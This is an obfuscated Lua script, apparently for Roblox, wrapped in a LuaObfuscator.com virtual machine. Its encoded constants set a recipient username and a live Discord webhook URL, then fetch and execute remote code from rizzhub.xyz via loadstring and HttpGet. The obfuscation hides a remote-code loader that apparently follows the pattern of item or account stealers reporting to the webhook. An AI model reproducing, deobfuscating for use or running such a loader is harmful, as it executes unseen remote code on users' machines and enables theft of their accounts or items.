--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (0==v71) then v19=v0(v3(v30,1,1));return "";end end else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v30,16));if v19 then local v98=v5(v73,v19);v19=nil;return v98;else return v73;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v74=0 -(0 + 0) ;local v75;while true do if (v74==0) then v75=(v31/((592 -(237 + 353))^(v32-(1 + 0))))%((2 + 0)^(((v33-(1966 -(162 + 68 + 1735))) -(v32-(929 -(710 + 218)))) + (1865 -(1851 + 13)))) ;return v75-(v75%1) ;end end else local v76=(1921 -(636 + 1283))^(v32-(513 -(194 + 318))) ;return (((v31%(v76 + v76))>=v76) and (2 -(4 -3))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (9 -7) );v18=v18 + 2 ;return (v36 * (2213 -(1217 + 740))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;return (v40 * (16777593 -(275 + 102))) + (v39 * (28868 + 36668)) + (v38 * (1339 -((719 -(389 + 155)) + 908))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,1 + (422 -(408 + 14)) ,20) * ((1 + 1)^(796 -(612 + (716 -(518 + 46)))))) + v41 ;local v45=v20(v42,45 -24 ,(1193 -(459 + 634)) -69 );local v46=((v20(v42,19 + 13 )==(1898 -(1265 + 632))) and  -(1 + 0)) or (1694 -(1535 + 158)) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else v45=1;v43=0;end elseif (v45==(6935 -4888)) then return ((v44==(1697 -(286 + 1411))) and (v46 * (((3 -2) -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/(2^(1 + 51)))) ;end local function v25(v47)local v48=0 -(0 + 0) ;local v49;local v50;while true do if (v48==0) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=2 -1 ;end if (v48==((4359 -2988) -(693 + 677))) then v49=v3(v16,v18,(v18 + v47) -((1 -0) -0) );v18=v18 + v47 ;v48=2 + 0 + 0 ;end if (v48==3) then return v6(v50);end if (v48==(1771 -((4268 -3171) + 672))) then v50={};for v77=1466 -(843 + 622) , #v49 do v50[v77]=v2(v1(v3(v49,v77,v77)));end v48=3;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v64=0;while true do if (v64==(517 -(463 + 54))) then if (2==v51) then local v89=0 + 0 ;while true do if (v89~=(0 -0)) then else for v104=1,v56 do local v105=707 -(283 + 424) ;local v106;local v107;while true do if ((0 -0)==v105) then v106=v21();v107=nil;v105=1;end if (1==v105) then if (v106==1) then v107=v21()~=(1107 -(541 + 566)) ;elseif (v106==2) then v107=v24();elseif (v106==(3 + 0)) then v107=v25();end v57[v104]=v107;break;end end end v55[7 -4 ]=v21();v89=917 -(55 + 861) ;end if (v89==(310 -(182 + 127))) then for v108=1,v23() do local v109=0;local v110;local v111;local v112;local v113;while true do if (v109~=(2 -0)) then else while true do if (v110~=1) then else v113=nil;while true do if (v111==(1 + 0)) then while true do if (v112==0) then v113=v21();if (v20(v113,1 + 0 ,1)~=0) then else local v148=0;local v149;local v150;local v151;local v152;local v153;while true do if (v148~=2) then else v153=nil;while true do if (v149==(710 -(370 + 340))) then local v165=0 -0 ;while true do if (v165==1) then v149=1;break;end if (0==v165) then v150=0 + 0 ;v151=nil;v165=1 + 0 ;end end end if ((1 + 0)~=v149) then else local v166=0;local v167;while true do if (v166~=0) then else v167=94 -(65 + 29) ;while true do if (v167==1) then v149=2;break;end if ((0 + 0)~=v167) then else v152=nil;v153=nil;v167=1;end end break;end end end if (v149~=2) then else while true do if (v150==0) then local v172=0;local v173;local v174;while true do if (v172~=(1 + 0)) then else while true do if (0==v173) then v174=941 -(564 + 377) ;while true do if (v174~=(0 -0)) then else local v186=0;while true do if (v186~=1) then else v174=1 + 0 ;break;end if (v186==0) then v151=v20(v113,8 -6 ,3);v152=v20(v113,4,6);v186=1 + 0 ;end end end if (v174~=(1 -0)) then else v150=2 -1 ;break;end end break;end end break;end if (v172==(0 + 0)) then v173=0;v174=nil;v172=1;end end end if (v150==2) then local v175=0 + 0 ;while true do if (v175==0) then local v182=0;while true do if (1~=v182) then else v175=1;break;end if (0==v182) then local v185=0;while true do if (v185~=(2 -1)) then else v182=2 -1 ;break;end if (v185==(0 -0)) then if (v20(v152,1,1)~=(1 + 0)) then else v153[2]=v57[v153[2 + 0 ]];end if (v20(v152,2,2)==(1634 -(1318 + 315))) then v153[3]=v57[v153[3]];end v185=1;end end end end end if (v175==(2 -1)) then v150=3 + 0 ;break;end end end if ((2 + 1)==v150) then if (v20(v152,3,3)==(1 + 0)) then v153[4 + 0 ]=v57[v153[4]];end v52[v108]=v153;break;end if (v150==(1 -0)) then local v177=0 + 0 ;local v178;local v179;while true do if (v177~=(1007 -(963 + 44))) then else v178=0 + 0 ;v179=nil;v177=1 + 0 ;end if (v177==1) then while true do if (v178==0) then v179=0 + 0 ;while true do if (v179~=(1341 -(1303 + 37))) then else v150=2;break;end if (v179~=(365 -(262 + 103))) then else local v187=0;while true do if (v187==0) then v153={v22(),v22(),nil,nil};if (v151==(0 -0)) then local v192=167 -(106 + 61) ;while true do if (v192==0) then v153[3]=v22();v153[3 + 1 ]=v22();break;end end elseif (v151==1) then v153[3]=v23();elseif (v151==2) then v153[8 -5 ]=v23() -(2^(432 -(196 + 220))) ;elseif (v151==3) then local v197=0 -0 ;local v198;while true do if (v197~=(903 -(320 + 583))) then else v198=0;while true do if (v198==(1419 -(123 + 1296))) then v153[3]=v23() -(2^(43 -27)) ;v153[706 -(594 + 108) ]=v22();break;end end break;end end end v187=429 -(138 + 290) ;end if (v187==1) then v179=1;break;end end end end break;end end break;end end end end break;end end break;end if ((3 -2)==v148) then v151=nil;v152=nil;v148=2;end if (v148==(0 -0)) then v149=1327 -(1045 + 282) ;v150=nil;v148=1;end end end break;end end break;end if ((0 -0)==v111) then local v120=431 -(57 + 374) ;while true do if (v120==(940 -(484 + 456))) then local v129=795 -(666 + 129) ;while true do if (v129==0) then v112=0;v113=nil;v129=1;end if ((2 -1)==v129) then v120=1;break;end end end if (v120==(3 -2)) then v111=4 -3 ;break;end end end end break;end if (v110==0) then local v119=0 + 0 ;while true do if (v119==0) then v111=0 + 0 ;v112=nil;v119=743 -(53 + 689) ;end if (v119==(408 -(400 + 7))) then v110=1 -0 ;break;end end end end break;end if (v109==(1114 -(926 + 188))) then v110=0;v111=nil;v109=1 -0 ;end if ((3 -2)==v109) then v112=nil;v113=nil;v109=1833 -(53 + 1778) ;end end end v51=3;break;end end end if (v51~=(0 + 0)) then else v52={};v53={};v54={};v51=1;end v64=1;end if (v64~=(262 -(230 + 31))) then else if (v51~=1) then else v55={v52,v53,nil,v54};v56=v23();v57={};v51=5 -3 ;end if (v51~=(2 + 1)) then else local v90=0;local v91;while true do if (v90~=(930 -(857 + 73))) then else v91=1784 -(820 + 964) ;while true do local v114=0;while true do if (0~=v114) then else if (v91==(3 -2)) then return v55;end if (v91==0) then local v116=114 -(109 + 5) ;while true do if (v116~=1) then else v91=280 -(110 + 169) ;break;end if (v116==(0 -0)) then for v121=1,v23() do v53[v121-(1799 -(59 + 1739)) ]=v28();end for v123=1 + 0 ,v23() do v54[v123]=v23();end v116=1 + 0 ;end end end break;end end end break;end end end break;end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v65=0;local v66;local v67;local v68;local v69;local v70;while true do if (v65==2) then v70=nil;function v70()local v79=v61;local v80=v62;local v81=v63;local v82=v27;local v83={};local v84={};local v85={};for v92=0 -0 ,v69 do if (((601 + 953)<=(6203 -(139 + 1289))) and (v92>=v81)) then v83[v92-v81 ]=v68[v92 + (159 -(120 + 38)) ];else v85[v92]=v68[v92 + 1 + 0 ];end end local v86=(v69-v81) + 1 + 0 ;local v87;local v88;while true do local v93=399 -(319 + 80) ;local v94;local v95;while true do if ((v93==(0 + 0)) or (((10142 -6412) + 279)<(3039 -(173 + 1608)))) then v94=954 -(937 + 17) ;v95=nil;v93=1;end if ((v93==(1986 -(836 + 1149))) or ((3329 + 345 + 570)<=(4622 -(256 + 1200)))) then while true do if ((3813==(14524 -10711)) and (v94==(0 + 0))) then v95=612 -(248 + (1568 -(869 + 335))) ;while true do if ((v95==(0 -0)) or ((3698 + 208)<(1473 -772))) then local v117=0 + 0 ;local v118;while true do if (((5592 -(1414 + 66))>=(6192 -3218)) and (v117==(0 -0))) then v118=0;while true do if ((v118==(0 -0)) or (2296==(5278 -(386 + 400)))) then local v125=998 -(142 + 856) ;while true do if ((4356>=(7015 -(14919 -9708))) and (v125==(1 -(489 -(79 + 410))))) then v118=1 + 0 ;break;end if ((v125==(0 -0)) or ((2071 -((186 -(83 + 76)) + 164))<=(2147 -572))) then v87=v79[v66];v88=v87[1];v125=1 + 0 ;end end end if (((5051 -(501 + 1131))<(3545 + 498)) and (v118==1)) then v95=1;break;end end break;end end end if ((v95==(1 -0)) or ((1851 -1295)>(7352 -3050))) then if (((188 + 3319)>=(3068 -(21 + 130 + 37 + 22))) and (v88<=4)) then if ((4416>(2533 -1157)) and (v88<=(489 -(93 + 337 + 58)))) then if (((1115 + 2271)>(620 + 218)) and (v88==0)) then do return;end else v85[v87[2 -0 ]]=v87[1514 -(1027 + (1736 -(598 + 654))) ];end elseif ((v88<=2) or ((1796 + 161)<(733 + 420))) then v66=v87[1 + (1740 -(191 + 1547)) ];elseif ((v88==((8 + 0) -5)) or (4917==(9495 -(6324 -(446 + 690))))) then local v130=0 -0 ;local v131;local v132;while true do if (((13279 -9216)>(4757 -(93 + 706))) and (v130==(2 -1))) then v85[v131 + 1 ]=v132;v85[v131]=v132[v87[9 -5 ]];break;end if (((576 + 536)<=(7805 -3955)) and (v130==(1431 -(997 + 434)))) then local v159=0 + 0 ;while true do if (((2057 -(449 + 3))>=(123 + 30)) and (v159==(1 + 0))) then v130=1 -(1413 -(86 + 1327)) ;break;end if ((v159==(0 -0)) or (814>(2660 + 1593))) then v131=v87[466 -(244 + 220) ];v132=v85[v87[1399 -(734 + 662) ]];v159=1 + 0 ;end end end end else v85[v87[4 -2 ]]=v87[3]~=(0 + (1427 -(573 + 854))) ;end elseif ((v88<=7) or ((11885 -8470)<=2100)) then if ((v88<=(378 -(138 + 235))) or ((5619 -3952)>(6752 -2813))) then v85[v87[4 -2 ]]();elseif ((v88>(11 -5)) or (((6290 -(342 + 1539)) -3098)>=2808)) then local v134=0 -0 ;local v135;local v136;local v137;local v138;local v139;while true do if ((v134==(1 + 1)) or ((3890 -(257 + 141))<(3527 -(384 + 184)))) then v139=nil;while true do if (((195 + 42)>=(29 + 16)) and (v135==(2 -0))) then for v168=v136,v67 do local v169=0 + 0 ;local v170;while true do if ((2781>(253 + 1396)) and (v169==(0 + (0 -0)))) then v170=0 -0 ;while true do if ((v170==0) or ((508 + 100)>((921 + 3179) -((997 -(344 + 476)) + 202)))) then v139=v139 + 1 + 0 ;v85[v168]=v137[v139];break;end end break;end end end break;end if ((v135==(0 + 0)) or ((385 + 989)<=178)) then local v162=0 -(0 -0) ;while true do if ((((5927 + 1101) -3021)>=((6565 -(981 + 155)) -1686)) and (v162==1)) then v135=802 -(755 + 46) ;break;end if ((v162==0) or ((3868 -(101 + 1127))>=(174 + 3711))) then v136=v87[1 + 0 + 1 ];v137,v138=v82(v85[v136](v13(v85,v136 + 1 + 0 ,v87[11 -8 ])));v162=1 + 0 + 0 ;end end end if (((211 + 418)>=(309 -(186 -88))) and (v135==(1 + 0))) then v67=(v138 + v136) -(1 + 0) ;v139=0;v135=6 -4 ;end end break;end if ((v134==0) or ((5231 -(469 + 1225))==((793 -197) + 123))) then v135=0 + 0 ;v136=nil;v134=1 + 0 + 0 ;end if (((91 + 138)<=2587) and ((4 -3)==v134)) then v137=nil;v138=nil;v134=194 -(66 + 14 + 112) ;end end else local v140=1142 -(481 + 661) ;local v141;local v142;while true do if ((v140==(1519 -(659 + 860))) or ((813 -316)>=(4308 -(397 + 21)))) then v141=0 -0 ;v142=nil;v140=(1651 -(1038 + 609)) -3 ;end if ((v140==(1 -0)) or ((1369 + 3579)<4344)) then while true do if ((v141==(0 + 0)) or ((2648 -1984)==(6028 -(340 + 1349)))) then v142=v87[1 + 1 ];v85[v142]=v85[v142](v13(v85,v142 + (1361 -(1231 + 129)) ,v67));break;end end break;end end end elseif ((((4335 -(182 + 576)) -(64 + 832))<=(5147 -(202 + 857))) and (v88<=8)) then if ((((7757 + 839) -4635)>(603 + 1515)) and (v85[v87[1 + 1 ]]==v87[6 -2 ])) then v66=v66 + (852 -(772 + 76 + 3)) ;else v66=v87[1141 -(314 + 824) ];end elseif ((3617>=(270 + 168)) and (v88==(5 + 4))) then v60[v87[14 -(793 -(436 + 346)) ]]=v85[v87[148 -((1119 -(612 + 362)) + 1) ]];else v85[v87[1 + 1 ]]=v60[v87[1 + 2 ]];end v66=v66 + ((882 -227) -(551 + 103)) ;break;end end break;end end break;end end end end v65=3;end if (v65==1) then v68={...};v69=v12("#",...) -1 ;v65=2;end if (v65==3) then A,B=v27(v11(v70));if  not A[1] then local v96=0;local v97;while true do if (v96==0) then v97=v58[4][v66] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v65==0) then v66=1;v67= -1;v65=1;end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O0003083O00557365724E616D6503073O0048654461726B6E03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039373330363932333932373335393533382F715F556579726F4B5F4A6B526A4D367A503170735A6149676F4F416238513057315A6449435744536D57542D76636A5A6B7648334658666C6959656B5A586554646A5874026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756100153O0012013O00013O0026083O0008000100010004023O00080001001201000100033O001209000100023O001201000100053O001209000100043O0012013O00063O0026083O0001000100060004023O0001000100120A000100073O00120A000200083O0020030002000200090012010004000A4O0004000500014O0007000200054O000600013O00022O00050001000100010004023O001400010004023O000100016O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
